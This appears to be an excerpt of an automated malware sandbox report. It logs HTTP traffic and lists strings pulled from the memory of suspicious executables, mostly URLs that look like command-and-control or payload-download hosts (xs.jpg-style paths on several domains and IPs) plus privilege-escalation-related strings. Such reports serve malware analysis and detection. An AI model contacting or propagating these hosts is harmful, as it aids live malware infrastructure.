        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:03:41 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:03:45 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: YMZwp.exe, 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp, YMZwp.exe, 00000009.00000003.1281847321.0000000000A50000.00000004.00001000.00020000.00000000.sdmp
        String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
        Source: cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmp
        String found in binary or memory: http://173.193.19.14/logo.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
        String found in binary or memory: http://89.119.67.154/testo5/
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
        String found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmp
        String found in binary or memory: http://a3inforservice.com.br/images/logof.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmp
        String found in binary or memory: http://accnet.ca/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmp
        String found in binary or memory: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmp
        String found in binary or memory: http://ahmediye.net/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmp
        String found in binary or memory: http://althawry.org/images/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?7b245cb2=-326012216B
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?7b245cb2=-326012216F
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?8d5f7dbb=897447660
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?90e4380b=1133568044
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?90e4380b=11335680442&_
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?93473576=646867692
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?9a20876f=88427094
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?9a20876f=88427094s
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?b36f01f5=1725826026
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?b36f01f5=1725826026fA
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?cfe83619=260640381
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?cfe83619=260640381L&A
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?e60800=75376640L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpg?ee51bd01=-593266174
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?13a89f9=164909000
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1964acc0=1278084672
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1H
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1b99da6=86825202
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1c98993=269866539
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?27da790=167157312s.Tz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?325396b5=-1835223640
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?362c1e4=113607624#.
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?37f8d56f=1339359386
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?37f8d56f=1339359386L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?434c9e5=282273684
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?45eba6e7=794638136
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?59e2a88=565509936
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?626616cd=-335646207
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?811c5c4=406147404#
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?811c5c4=406147404dS.tz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?84b38e=43483590
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?84b38e=43483590:
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?8a282b2c=-954651084
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a5242bcc=-834303444
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a5242bcc=-834303444LEu
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a8241ece=-1855376372
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?a8241ece=-18553763721
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?e4bc5c05=1550460958
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?e4bc5c05=1550460958LCuy
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?105cc6e8=823547064
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?177b7c4b=-749248861
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?177b7c4b=-749248861_
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?223453a1=573854625
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?223453a1=573854625A
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?5f3bd7f4=-102842464
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?62d506=64770620
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?62d506=64770620M
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-2059992880
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-20599928806
